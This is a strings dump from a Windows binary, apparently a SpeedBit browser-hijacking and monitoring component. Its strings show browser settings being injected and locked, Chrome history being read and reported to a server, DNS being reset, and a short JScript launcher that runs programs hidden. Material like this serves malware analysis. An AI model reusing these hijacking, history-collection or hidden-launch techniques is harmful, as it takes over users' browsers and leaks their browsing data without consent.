    `.rdata
    @.data
    .rsrc
    @.reloc
    WQhl%U
    FTPj
    E@PSSh
     1 23 456
    Jx.SHx
    .TxK%Yx
    208.69.150.250
    208.69.150.252
    8.8.8.8
    SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
    Catcher.ProcessId:
    Catcher.Path:
    Watcher.Filter:
    2.1.0.81
    smu.exe
    Chrome
    Report.xml
    /Url:
    unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
    3.7.2
    SQLite format 3
    CREATE TABLE sqlite_master(
    sql text
    CREATE TEMP TABLE sqlite_temp_master(
    REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYo
    inflate 1.2.3 Copyright 1995-2005 Mark Adler
    deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
    1.2.3
    ?456789:;<=
    !"#$%&'()* ,-./0123
    Report factory:
    Update.xml
    URLSet
    Report
    homeURL
    suggestURL
    newTabURL
    ieSearchURL
    chSearchURL
    ffSearchURL
    opSearchURL
    chromeKeyword
    [UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]
    vup.tmp
    Argument.CheckResult:
    Argument.IsRunning:
    Delivery of report succeeded. TaskId:
    Delivery of report failed.
    &#xX;
    %s="%s"
    %s='%s'
    version="%s"
    encoding="%s"
    standalone="%s"
    SHDeleteKeyW
    RegDeleteKeyExA
    RegDeleteKeyExW
    NtQueryKey
    1.3.6.1.4.1.311.2.1.12
    Snapshot.xml
    GoogleChrome
    MozillaFirefox
    AboutTabsUrl
    HomePageUrl
    DefaultProviderKeyword
    UrlsToRestoreOnStartup
    StartupHomepageUrl
    Chrome propagate flags:
    Firefox propagate flags:
    ParentKey:
    2, 1, 0, 81
    Envelop.xml
    Configuration.xml
    UrlSet
    Opera
    StartPageUrl
    AboutTabUrl
    SearchScopeUrl
    SearchScopeIconUrl
    SearchScopeSuggestUrl
    DefaultProviderSearchUrl
    DefaultProviderIconUrl
    DefaultProviderSuggestUrl
    SearchPluginUrl
    SearchPluginSuggestionUrl
    TabPageUrl
    SearchEngineFaviconUrl
    SearchEngineSuggestionUrl
    SearchEngineSearchUrl
    SearchEngineKeyword
    System.xml
    Reset-2.1.0.7
    UpdateUrl
    ReportUrl
    ReportDlls
    User.xml
    urls
    SELECT * FROM urls
    ERROR: %s
    WebData path:
    Argument.GeneralConfig:
    Argument.Snapshot:
    Argument.Flags:
    suggest_url
    originating_url
    favicon_url
    keyword
    keyword LIKE '
    keywords
    WHERE key = 'Default Search Provider ID'
    key = 'Default Search Provider ID'
    DELETE from keywords WHERE id =
    search_url
    icon_url
    startup_urls
    urls_to_restore_on_startup
    chrome_url_overrides
    instant_url
    web_url
    search_icon.png
    select count(*) from sqlite_master where type = 'table' and name = '
    %d-%m-%Y %H:%M, %a
    large file support is disabled
    SQL logic error or missing database
    foreign_keys
    sqlite_compileoption_get
    sqlite_compileoption_used
    sqlite_source_id
    sqlite_version
    sqlite_attach
    sqlite_detach
    sqlite_stat1
    sqlite_rename_parent
    sqlite_rename_trigger
    sqlite_rename_table
    RowKey
    SQLITE_
    d-d-d d:d:d
    d:d:d
    d-d-d
    failed to allocate %u bytes of memory
    failed memory resize %u to %u bytes
    922337203685477580
    API call with %s database connection pointer
    %s-shm
    %s\etilqs_
    OsError 0x%x (%u)
    Recovered %d frames from WAL file %s
    invalid page number %d
    2nd reference to page %d
    Failed to read ptrmap key=%d
    Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
    %d of %d pages missing from overflow list starting at %d
    failed to get page %d
    freelist leaf count too big on page %d
    Page %d:
    unable to get the page. error code=%d
    btreeInitPage() returns error code %d
    On tree page %d cell %d:
    On page %d at right child:
    Corruption detected in cell %d on page %d
    Multiple uses for byte %d of page %d
    Fragmentation of %d bytes reported as %d on page %d
    Page %d is never used
    Pointer map page %d is referenced
    Outstanding page count goes from %d to %d during this analysis
    keyinfo(%d
    %s(%d)
    %s-mjX
    foreign key constraint failed
    unable to use function %s in the requested context
    bind on a busy prepared statement: [%s]
    zeroblob(%d)
    abort at %d in [%s]: %s
    constraint failed at %d in [%s]
    cannot open savepoint - SQL statements in progress
    no such savepoint: %s
    cannot %s savepoint - SQL statements in progress
    cannot rollback transaction - SQL statements in progress
    cannot commit transaction - SQL statements in progress
    sqlite_temp_master
    sqlite_master
    SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
    cannot change %s wal mode from within a transaction
    database table is locked: %s
    statement aborts at %d: [%s] %s
    cannot open virtual table: %s
    cannot open view: %s
    no such column: "%s"
    foreign key
    indexed
    cannot open %s column for writing
    cannot open value of type %s
    misuse of aliased aggregate %s
    %s: %s.%s.%s
    %s: %s.%s
    %s: %s
    not authorized to use function: %s
    %r %s BY term out of range - should be between 1 and %d
    too many terms in %s BY clause
    Expression tree is too large (maximum depth %d)
    variable number must be between ?1 and ?%d
    too many SQL variables
    too many columns in %s
    misuse of aggregate: %s()
    %.*s"%w"%s
    %s%.*s"%w"
    %s OR name=%Q
    there is already another table or index with this name: %s
    sqlite_
    table %s may not be altered
    view %s may not be altered
    UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
    UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
    sqlite_sequence
    UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
    UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
    Cannot add a PRIMARY KEY column
    UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
    sqlite_altertab_%s
    CREATE TABLE %Q.%s(%s)
    DELETE FROM %Q.%s WHERE tbl=%Q
    SELECT idx, stat FROM %Q.sqlite_stat1
    invalid name: "%s"
    too many attached databases - max %d
    database %s is already in use
    unable to open database: %s
    no such database: %s
    cannot detach database %s
    database %s is locked
    %s %T cannot reference objects in database %s
    access to %s.%s.%s is prohibited
    access to %s.%s is prohibited
    object name reserved for internal use: %s
    there is already an index named %s
    too many columns on %s
    duplicate column name: %s
    default value of column [%s] is not constant
    table "%s" has more than one primary key
    AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
    no such collation sequence: %s
    CREATE %s %.*s
    UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
    CREATE TABLE %Q.sqlite_sequence(name,seq)
    view %s is circularly defined
    UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
    table %s may not be dropped
    use DROP TABLE to delete table %s
    use DROP VIEW to delete view %s
    DELETE FROM %s.sqlite_sequence WHERE name=%Q
    DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
    DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q
    foreign key on %s should reference only one column of table %T
    number of columns in foreign key does not match the number of columns in the referenced table
    unknown column "%s" in foreign key definition
    indexed columns are not unique
    table %s may not be indexed
    views may not be indexed
    virtual tables may not be indexed
    there is already a table named %s
    index %s already exists
    sqlite_autoindex_%s_%d
    table %s has no column named %s
    CREATE%s INDEX %.*s
    INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
    no such index: %S
    index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
    DELETE FROM %Q.%s WHERE name=%Q
    DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q
    a JOIN clause is required before %s
    unable to identify the object to be reindexed
    table %s may not be modified
    cannot modify %s because it is a view
    foreign key mismatch
    table %S has %d columns but %d values were supplied
    %d values for %d columns
    table %S has no column named %s
    %s.%s may not be NULL
    PRIMARY KEY must be unique
    sqlite3_extension_init
    unable to open shared library [%s]
    no entry point [%s] in shared library [%s]
    error during initialization: %s
    automatic extension loading failed: %s
    foreign_key_list
    *** in database %s ***
    unsupported encoding: %s
    malformed database schema (%s)
    %s - %s
    unsupported file format
    SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
    database schema is locked: %s
    unknown or unsupported join type: %T %T%s%T
    RIGHT and FULL OUTER JOINs are not currently supported
    a NATURAL join may not have an ON or USING clause
    cannot have both ON and USING clauses in the same join
    cannot join using column %s - column not present in both tables
    %s.%s
    %s:%d
    ORDER BY clause should come after %s not before
    LIMIT clause should come after %s not before
    SELECTs to the left and right of %s do not have the same number of result columns
    no such index: %s
    sqlite_subquery_%p_
    no such table: %s
    sqlite3_get_table() called with two or more incompatible queries
    cannot create %s trigger on view: %S
    cannot create INSTEAD OF trigger on table: %S
    INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
    no such trigger: %S
    -- TRIGGER %s
    no such column: %s
    PRAGMA vacuum_db.synchronous=OFF
    SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
    SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
    SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
    SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
    SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
    SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
    INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
    UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
    vtable constructor failed: %s
    vtable constructor did not declare schema: %s
    no such module: %s
    table %s: xBestIndex returned an invalid plan
    at most %d tables in a join
    cannot use index: %s
    TABLE %s
    %s AS %s
    %s WITH AUTOMATIC INDEX
    %s WITH INDEX %s
    %s VIA MULTI-INDEX UNION
    %s USING PRIMARY KEY
    %s VIRTUAL TABLE INDEX %d:%s
    %s ORDER BY
    the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
    the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
    unable to close due to unfinished backup operation
    unknown database: %s
    no such vfs: %s
    database corruption at line %d of [%.10s]
    misuse at line %d of [%.10s]
    cannot open file at line %d of [%.10s]
    Argument.StartPage:
    Argument.Autosearch:
    Argument.NewTabPageShow:
    Argument.SearchScopeId:
    Argument.Tabs:
    SHELL32.dll
    SHLWAPI.dll
    KERNEL32.dll
    USER32.dll
    RegOpenKeyExA
    RegCloseKey
    RegOpenKeyExW
    ADVAPI32.dll
    ole32.dll
    OLEAUT32.dll
    MSVCP90.dll
    MSVCR90.dll
    _amsg_exit
    _crt_debugger_hook
    WinHttpReceiveResponse
    WinHttpSendRequest
    WinHttpConnect
    WinHttpCloseHandle
    WinHttpQueryDataAvailable
    WinHttpOpen
    WinHttpOpenRequest
    WinHttpReadData
    WinHttpGetIEProxyConfigForCurrentUser
    WINHTTP.dll
    GetExtendedTcpTable
    IPHLPAPI.DLL
    WS2_32.dll
    PSAPI.DLL
    WTSAPI32.dll
    Secur32.dll
    CryptMsgClose
    CertGetNameStringW
    CertFreeCertificateContext
    CertFindCertificateInStore
    CertCloseStore
    CryptMsgGetParam
    CRYPT32.dll
    USERENV.dll
    CreatePipe
    ConnectNamedPipe
    CreateNamedPipeW
    GetNamedPipeInfo
    DisconnectNamedPipe
    GetProcessHeap
    RegCreateKeyW
    RegCreateKeyExW
    RegOpenKeyW
    RegQueryInfoKeyW
    RegDeleteKeyA
    RegDeleteKeyW
    RegEnumKeyExA
    RegCreateKeyA
    RegCreateKeyExA
    RegQueryInfoKeyA
    RegOpenKeyA
    RegEnumKeyExW
    RegEnumKeyW
    .?AVImplementation@ReportBuilder@Monitor@SpeedBit@@
    .?AVReportBuilder@Monitor@SpeedBit@@
    .?AVHistoryReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@
    .?AVReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@
    .?AVImplementation@ServerReporter@Monitor@SpeedBit@@
    .?AVServerReporter@Monitor@SpeedBit@@
    .?AVEventHandler@SendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@
    .?AVSendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@
    .?AVProfile@Implementation@InstallInfo@Firefox@SpeedBit@@
    .?AVInstallInfo@Implementation@0Firefox@SpeedBit@@
    .?AVProfile@InstallInfo@Firefox@SpeedBit@@
    .?AVInstallInfo@Firefox@SpeedBit@@
    .?AVImplementation@PipedProcess@Utils@SpeedBit@@
    .?AVPipedProcess@Utils@SpeedBit@@
    .?AVImplementation@MachineKey@Utils@SpeedBit@@
    .?AVMachineKey@Utils@SpeedBit@@
    .?AVFirefoxSettings@Implementation@Snapshot@Injection@SpeedBit@@
    .?AVChromeSettings@Implementation@Snapshot@Injection@SpeedBit@@
    .?AVSettings@Firefox@Snapshot@Injection@SpeedBit@@
    .?AVSettings@Chrome@Snapshot@Injection@SpeedBit@@
    .?AVUrlSet@Implementation@General@Config@SpeedBit@@
    .?AVFirefoxValueSet@Implementation@General@Config@SpeedBit@@
    .?AVChromeValueSet@Implementation@General@Config@SpeedBit@@
    .?AVOperaSettings@Implementation@General@Config@SpeedBit@@
    .?AVFirefoxSettings@Implementation@General@Config@SpeedBit@@
    .?AVChromeSettings@Implementation@General@Config@SpeedBit@@
    .?AVSettings@Opera@General@Config@SpeedBit@@
    .?AVValueSet@Firefox@General@Config@SpeedBit@@
    .?AVSettings@Firefox@General@Config@SpeedBit@@
    .?AVValueSet@Chrome@General@Config@SpeedBit@@
    .?AVSettings@Chrome@General@Config@SpeedBit@@
    .?AVUrlSet@General@Config@SpeedBit@@
    .?AVFirefoxSettings@Implementation@User@Config@SpeedBit@@
    .?AVChromeSettings@Implementation@User@Config@SpeedBit@@
    .?AVSettings@Firefox@User@Config@SpeedBit@@
    .?AVSettings@Chrome@User@Config@SpeedBit@@
    .?AVChromeBrowserHistory@SQLite@SpeedBit@@
    .?AVException@sql@@
    .?AVImplementation@Factory@BrowserInfo@Chrome@SpeedBit@@
    .?AVFactory@BrowserInfo@Chrome@SpeedBit@@
    .?AVImplementation@BrowserInfo@Chrome@SpeedBit@@
    .?AVBrowserInfo@Chrome@SpeedBit@@
    .?AVLoader@Extension@Chrome@SpeedBit@@
    .?AVImplementation@Extension@Chrome@SpeedBit@@
    .?AVExtension@Chrome@SpeedBit@@
    .?AVBrowserSettings@Implementation@0Chrome@SpeedBit@@
    .?AVBrowserSettings@Chrome@SpeedBit@@
    .?AVImplementation@WebDataDB@SQLite@SpeedBit@@
    .?AVWebDataDB@SQLite@SpeedBit@@
    .?AVBrowserSettings@Implementation@0Firefox@SpeedBit@@
    .?AVBrowserSettings@Firefox@SpeedBit@@
    PAD// SpeedBit hidden execute
    if (WScript.Arguments.length > 0)
    var root = WScript.Arguments(0);
    for (var i = 1, n = WScript.Arguments.length; i < n;   i)
    args.push(WScript.Arguments(i));
    var path = "\""   root.replace(/\\*$/, "").replace(/\//g, "\\")   "\"";
    path  = " \""   args.join("\" \"")   "\"";
    var shell = WScript.CreateObject("WScript.Shell");
    shell.Run(path, 0, false);
    ;$;,;4;>;
    7,727\7}7
    6!6 626\6
    8-8b8}8
    ;'<9<><}<
    3"3,31393
    313f3t3
    8€8U8n8
    00O0m0
    9(:~:#;2;
    7q7f7
    8"939@9[9
    <$=.=6=>=
    11c1v1
    9%9S9d9
    2,2Q2
    0&0 030~0
    3B4C4T4
    6$6.656_6
    >1>6>>>`>|>
    0%1S1c1
    ? ?$?(?,?0?4?8?
    ? ?$?(?,?0?
    4m4%7U7|7
    0 0$0(0,0
    <&<2<;<^<
    2*232<2_2
    6 6)656^6
    0%1U1h1~1
    5l6Y6o6x6
    <(<1<=<`<
    1 1$1(1,10141
    1$2(2,202
    3 3$3(3,3034383<3
    Injection::Snapshot::Controller::IsChromeInstalled
    Chrome installed:
    Injection::Snapshot::Controller::IsFirefoxInstalled
    Firefox installed:
    Chrome unchanged:
    Firefox unchanged:
    Checking
    Checking
    logs\${ModuleName}.${Pid}.log
    WatchmanKey::TimeBomb::UninstallTimeBomb
    Reporting
    ChromeExtensionMonitorWorkerThread started
    ChromeExtensionMonitor::CollectExtensionInfo
    ChromeExtensionMonitor::CheckExtension
    8Reset DNS to 8.8.8.8 for adapter
    WinHTTP Example/1.0
    www.google.com
    SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
    Registry::Helper::RegOpenKeyExA
    Chrome::StartPageProtectionEnabled
    Chrome::SearchEngineProtectionEnabled
    Chrome::RestoreOnStartupProtectionEnabled
    Chrome::StartPageProtectionDisabled
    Chrome::SearchEngineProtectionDisabled
    Chrome::RestoreOnStartupProtectionDisabled
    Firefox::StartPageChangedByUser
    Firefox::SearchEngineChangedByUser
    Explorer.HomePageEvent:
    Explorer.SearchEngineEvent:
    Firefox.HomePageEvent:
    Firefox.SearchEngineEvent:
    ProcessCatcher::ExecutionContext::Resume
    Allocation
    ProcessMonitor::ExecutionContext::Resume
    EndsBy:\iexplore.exe|EndsBy:\rundll32.exe
    EndsBy:\chrome.exe
    EndsBy:\firefox.exe
    EndsBy:\opera.exe
    iexplore.exe
    rundll32.exe
    chrome.exe
    firefox.exe
    opera.exe
    smei32.dll
    smci32.dll
    smfi32.dll
    smoi32.dll
    smi32.exe
    Utils::PipedProcess::Create
    Utils::PipedProcess::Start
    Utils::PipedProcess::WriteData
    [ReportDllsThread]
    ProcessWatcher::ExecutionContext::Resume
    Local proxy port:
    127.0.0.1
    [ProxyMonitor::getProcessByPort]
    Failed to get GetExtendedTcpTable
    [ReportBuilder::MakeDefaultBrowserSettingsElement]
    [ReportBuilder::CalculateHash]
    Result.Hash:
    [ReportBuilder::MakeHistoryReport]
    Building history report...
    ReportBuilder::GetWMISystemInfo
    ReportBuilder::GetExplorerBrowserInfo
    ReportBuilder::GetChromeBrowserInfo
    . Chrome Search:
    History Report:
    [ReportBuilder::MakeReport]
    Report:
    [ReportBuilder::GetExplorerBrowserInfo]
    [ReportBuilder::GetChromeBrowserInfo]
    Chrome::BrowserInfo::Factory::Create
    Chrome::BrowserInfo::Factory::GetInfo
    sma.exe
    Utils::PipedProcess::ReadData
    Utils::PipedProcess::Wait
    Utils::PipedProcess::WriteEof
    777705555443332
    5555443332
    5555443332
    Utils::MachineKey::Create
    Utils::MachineKey::Generate
    Encrypt data. Key:
    Decrypt data. Key:
    ReportBuilder::MakeInstallReport
    [ServerReporter::SendInstallReport]
    ReportBuilder::MakeUninstallReport
    [ServerReporter::SendUninstallReport]
    ReportBuilder::MakeRegulatReport
    [ServerReporter::SendRegularReport]
    ReportBuilder::MakeUserActionReport
    [ServerReporter::SendUserActionReport]
    ReportBuilder::MakeHistoryReport
    [ServerReporter::SendHistoryReport]
    ServerReporter::MakeReport
    ServerReporter::SendReport
    [ServerReporter::SendReport]
    ServerEncryption::CreateSessionKey
    Report in Base 64:
    10D2FBE6-2346-4627-A9F5-FB48313C5001
    ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)
    ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one
    [ServerReporter::GetUserProfile]
    [ServerReporter::MakeReport]
    ServerReporter::GetUserProfile
    ReportBuilder::Create
    Result.Report:
    [ServerReporter::SetLastReportTime]
    WatchmanKey::Reporter::SetLastTime
    Package url:
    WatchmanKey::Updater::SetLastTime
    .Service
    /report
    /report1
    %d.%d.%d.%d%n
    Created URL Set object from configuration. Name:
    UrlSetID:
    Could not find matching URL set... Using old configuration
    [LocalScope::UpdateParser::ParseReportSection]
    Monitor::ServerEncryption::CreateSessionKey
    Full url:
    Data url:
    sbu.exe
    smw.sys
    wscript.exe
    smhe.js
    [Monitor::WatchmanGuard::SendReport]
    InstallReporter
    Monitor::ServerReporter::Create
    Monitor::ServerReporter::SendInitialReport
    /urlset:
    Options.InjectAllBrowsers:
    Options.InjectDefaultOnly:
    Options.ServiceName:
    Options.ProductCode:
    Options.ProductPriority:
    Options.EnablePinner:
    Options.UpdateUrl:
    Options.ReportUrl:
    Options.AutoStart:
    Options.ProtectSearch:
    Options.ProtectHome:
    Options.ProtectTab:
    Options.ExplorerInjection:
    Options.ChromeInjection:
    Options.FirefoxInjection:
    Options.OperaInjection:
    Options.ConfigPath:
    Options.ConfigKey:
    Getting current URL Set
    Getting URL Set from options
    ] Provided. And is different from current URL set [
    URL Set [
    Need to send report!!!
    ServerReporter::Create
    Original report URL:
    URL to use:
    ServerReporter::SendInitialReport
    general_config.xml
    system_config.xml
    [WatchmanInstaller::SendReport1]
    iexplore.exe is running, result for getting DLL's:
    firefox.exe is running, result for getting DLL's:
    chrome.exe is running, result for getting DLL's:
    ServerReporter::SendRegularReport
    [WatchmanInstaller::SendReport]
    ServerReporter::SendHistoryReport
    Currently set URLSet:
    Updating system config with new URL set...
    Already reported duiring first install
    Report' been sent:
    WatchmanInstaller::SendReport1
    calling SendReport1...
    WatchmanInstaller::SendReport
    [Monitor::WatchmanMonitor::CreateSendReportTask]
    SendReportTask
    new
    [Monitor::WatchmanMonitor::OnSendReportSucceeded]
    [Monitor::WatchmanMonitor::OnSendReportFailed]
    [Monitor::WatchmanMonitor::OnChromeProtectionChanged]
    User has changed the chrome protection for:
    [Monitor::WatchmanMonitor::OnResetFirefoxProtection]
    User has reset the firefox protection:
    Next report task:
    Scheduller::RegisterTask
    Monitor::Application::EnsureSystemKey
    Options.Revert:
    Settings.Final:
    UninstallReporter
    profiles.ini
    prefs.js
    Mozilla\Firefox\
    [Firefox::InstallInfo::ReadProfiles]
    [Firefox::InstallInfo::ParseProfiles]
    [Firefox::InstallInfo::QueryProfiles]
    Firefox::InstallInfo::ReadProfiles
    Firefox::InstallInfo::ParseProfiles
    [Firefox::InstallInfo::Query]
    SHELL32.DLL
    No profiles found! Maybe - first start of Firefox?
    ADVAPI32.DLL
    shlwapi.dll
    Utils::Registry::OpenKeyExW
    Subkey:
    [Utils::Registry::RecursiveDeleteKeyW]
    SHLWAPI.GetAddressOf
    WKERNEL32.DLL
    VERSION.DLL
    NTDLL.DLL
    [Utils::PipedProcess::CreateOutputHandles]
    [Utils::PipedProcess::CreateInputHandles]
    [Utils::PipedProcess::SpawnProcess]
    Utils::PipedProcess::CreateOutputHandles
    Utils::PipedProcess::CreateInputHandles
    Utils::PipedProcess::SpawnProcess
    [Utils::PipedProcess::Start]
    [Utils::PipedProcess::Wait]
    Utils::PipedProcess::WriteProc
    [Utils::PipedProcess::WriteData]
    Utils::PipedProcess::ReadProc
    [Utils::PipedProcess::ReadData]
    .cache
    SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
    ntdll.dll
    Could not create memory object. Object name: %s. %%s
    Could not open memory object. Object name: %s. %%s
    Could not map memory object. Object name: %s. %%s
    Could not map memory object. Object name: %s. Size: %u. %%s
    Could not create sync object for memory. Object name: %s. %%s
    pathToSignedProductExe
    SELECT * FROM Win32_OperatingSystem
    A[BrowserHistory::GetPropertyReport]
    Found URL:
    GIPHLPAPI.DLL
    GX-hX-hX-XX-XXXXXX
    \\.\pipe\
    Could not create thread event. %%s
    Could not create new client event. %%s
    Could not create accept thread. %%s
    Could not create work thread. %%s
    Could not start thread. %%s
    Stop IPC error. %%s
    Pipe (0x%X) read problems. %%s
    IAction::QueryInterface
    IExecAction::put_Path
    IExecAction::put_WorkingDirectory
    IExecAction::put_Arguments
    Ghttp\shell\open\command
    Software\Microsoft\Windows\CurrentVersion\App Paths
    [Utils::SoftwareInfo::GetHttpOpenHandler]
    Utils::Registry::OpenKeyW
    [SynchronousPipe::Write]
    [SynchronousPipe::Read]
    SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
    Not enough memory. Size: %s (%s)
    Error code: %u ('%s')
    Could not allocate IPC memory. Requires size: %u
    Could not create pipe. %%s
    Could not create pipe event. %%s
    Event error. %%s
    Pipe connecting error. %%s
    GCould not create IPC event. %%s
    yIEXPLORE.EXE
    SuggestionURL
    FaviconURL
    TopResultURLFallback
    Software\Microsoft\Internet Explorer\AboutURLs
    Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
    Software\Microsoft\Windows\CurrentVersion\Ext\Settings
    Failed to call enum URL's. Error:
    [Injection::Snapshot::Chrome::Settings::Dump]
    [Injection::Snapshot::Firefox::Settings::Dump]
    [Monitor::RestoreData::Controller::Build]
    [Monitor::RestoreData::Controller::Build]
    [Injection::Snapshot::Builder::BuildSettings]
    [Injection::Snapshot::Builder::BuildSettings]
    new
    Injection::Snapshot::Parser::Parse
    new
    Injection::Snapshot::Parser::Parse
    ReadStringNode
    [Injection::Snapshot::Parser::Parse]
    ReadStringNode
    [Injection::Snapshot::Parser::Parse]
    [Injection::Snapshot::Controller::IsChromeInstalled]
    Chrome::BrowserSettings::Create
    [Injection::Snapshot::Controller::IsFirefoxInstalled]
    Firefox::BrowserSettings::Create
    Chrome::BrowserSettings::RestoreState
    Firefox::BrowserSettings::RestoreState
    Argument.SystemConfig:
    Argument.Config::General:
    Argument.Config::User:
    Chrome::BrowserSettings::PropagateState
    Firefox::BrowserSettings::PropagateState
    Argument.UserSid:
    WatchmanKey::Users::SaveRestoreData
    [WatchmanKey::GetEncryptionKey]
    MachineKey::Create
    MachineKey::Generate
    [WatchmanKey::CleanupKey]
    [WatchmanKey::LoadEncodedData]
    WatchmanKey::GetEncryptionKey
    [WatchmanKey::SaveEncodedData]
    [WatchmanKey::System::LoadGeneralConfig]
    WatchmanKey::System::Open
    WatchmanKey::LoadEncodedData
    [WatchmanKey::System::SaveGeneralConfig]
    WatchmanKey::System::Ensure
    WatchmanKey::SaveEncodedData
    [WatchmanKey::System::LoadSystemConfig]
    [WatchmanKey::System::SaveSystemConfig]
    [WatchmanKey::Users::Ensure]
    WatchmanKey::EnsureKey
    [WatchmanKey::Users::Open]
    WatchmanKey::OpenKey
    [WatchmanKey::Users::LoadConfiguration]
    WatchmanKey::Users::Ensure
    [WatchmanKey::Users::SaveConfiguration]
    [WatchmanKey::Users::LoadRestoreData]
    [WatchmanKey::Updater::SetLastTime]
    [WatchmanKey::Updater::SetBlackListHash]
    [WatchmanKey::Updater::GetBlackListHash]
    [WatchmanKey::Reporter::GetLastTime]
    [WatchmanKey::Reporter::SetLastTime]
    [WatchmanKey::TimeBomb::Uninstall]
    WatchmanKey::SystemKey::Open
    smod.xml
    SearchModule.crx
    {7F4EFF06-7032-458e-AE16-1C1D8255C28A}
    {CFBFAE00-17A6-11D0-99CB-00C04FD64497}
    http://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
    DATAMNGR.DLL
    IEBHO.DLL
    [Config::General::UrlSet::Copy]
    [Config::General::Chrome::Settings::Dump]
    [Config::General::Chrome::Settings::Copy]
    [Config::General::Chrome::ValueSet::Copy]
    [Config::General::Firefox::Settings::Dump]
    [Config::General::Firefox::Settings::Copy]
    [Config::General::Firefox::ValueSet::Copy]
    [Config::General::Opera::Settings::Dump]
    [Config::General::Opera::Settings::Copy]
    Config::General::Parser::ParseUrlSet
    Config::General::Parser::ParseChromeSettings
    Config::General::Parser::ParseFirefoxSettings
    Config::General::Parser::ParseOperaSettings
    ReadStringNode
    lReadStringNode
    ReadStringNode
    ReadStringNode
    ReadStringNode
    [Config::General::Parser::ParseChromeSettings]
    MissedElement
    Config::General::Parser::ParseChromeValueSets
    [Config::General::Parser::ParseChromeValueSets]
    ReadStringNode
    ReadStringNode
    ReadStringNode
    ReadStringNode
    [Config::General::Parser::ParseFirefoxSettings]
    MissedElement
    Config::General::Parser::ParseFirefoxValueSets
    [Config::General::Parser::ParseFirefoxValueSets]
    ReadOptionalStringNode
    ReadOptionalStringNode
    ReadOptionalStringNode
    [Config::General::Parser::ParseUrlSet]
    MissedElement
    ReadStringNode
    ReadStringNode
    ReadStringNode
    ReadStringNode
    dReadStringNode
    [Config::General::Parser::ParseOperaSettings]
    MissedElement
    yReadStringNode
    [Config::General::Builder::Build]
    [Config::General::Builder::Build]
    [Config::General::Builder::Build]
    We couldn't find the URL Set section... probably an old configuration!
    WatchmanKey::System::LoadGeneralConfig
    WatchmanKey::System::SaveGeneralConfig
    IReset-2.1.0.7
